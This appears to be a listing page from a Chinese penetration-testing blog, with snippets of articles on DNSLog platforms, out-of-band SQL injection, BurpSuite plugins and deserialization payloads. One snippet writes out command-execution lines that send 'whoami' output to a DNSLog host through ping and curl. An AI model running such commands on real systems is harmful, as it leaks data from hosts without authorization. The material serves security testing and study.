01前言Antenna项目:https://github.com/wuba/Antenna使用文档:http://blog.antenna.cool/docs/introAntenna当前已经提供了白...
03月04日25 views评论com
http
技术 | 关于Antenna的隐匿性部署
03月04日25 views评论com
http
03月04日25 views评论com
http
关于Antenna的隐匿性部署
01前言Antenna项目:https://github.com/wuba/Antenna使用文档:http://blog.antenna.cool/docs/introAntenna当前已经提供了白...
03月03日58 views评论com
http
【渗透测试】MSSQL盲注实战
0x01 前言 在渗透测试中很多时候会遇到无报错回显的情况,除了一个个猜解以外,还可以结合DNSlog来快速获取数据库信息,本文主要介绍在MSSQL数据库下的DN...
02月21日157 views评论payload
渗透测试
多功能BurpSuite漏洞探测插件—TsojanScan
TsojanScan 一个集成的BurpSuite漏洞探测插件 First 本着市面上各大漏洞探测插件的功能比较单一,因此与TsojanSecTeam成员决定在已有框架的基础上修改并增加常用的漏洞探...
02月15日185 views评论burpsuite
fastjson
自建DNSLog平台
0x00 前言有时候网上一些常用的DNSLog平台可能会被目标站点黑名单过滤掉,此时就可以自建DNSLog平台来应对这种情况了。0x01 自建DNSLog平台本次使用一个域名的方式来搭建,而非网上大多...
01月28日296 views评论dnslog
dnslog平台
渗透测试-DNSLOG使用技巧
0x01 命令执行场景 Liunx/Unix/Mac OS系统:ping `whoami`.mydnslog.comcurl http://mydnslog.com/`whoami...
01月25日46 views评论com
http
实战记录之曲线救国
记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:为了节约时间直接祭出sqlmap,-r x.txt -v 3 ...
01月17日125 views实战记录之曲线救国已关闭评论dnslog
权限
利用DNS实现SQL注入带外查询(OOB)
根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inference(经典SQL注入),inband(盲注、推理注入、带内注入)和out-of-band一、什么是OOBout-of-band带...
01月04日107 views评论sql注入
windows
这个DNSLOG是我见过最好用的
兄弟们,发现一个贼好用的神器。这个DNSLOG是我见过最好用的域名是DDDD.CAM凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑...
12月31日104 views评论dnslog
字数
使用 Fuzztag 一键爆破反序列化链
背景 Yakit 新增的 Yso-Java-Hack 功能可以让我们生成反序列化利用的 payload ,通过图形化的方式简化了生成 payload 的过程,但发包过程由于需要针对不同的目标...
12月23日101 views评论payload
代码执行
漏洞探测辅助平台 Cola_Dnslog(v1.3.1)
=================================== 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,...
12月22日88 views评论dnslog
webserver
实战记录之曲线救国
记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:为了节约时间直接祭出sqlmap,-r x.txt -v 3 ...
12月21日27 views评论dnslog
数据包
16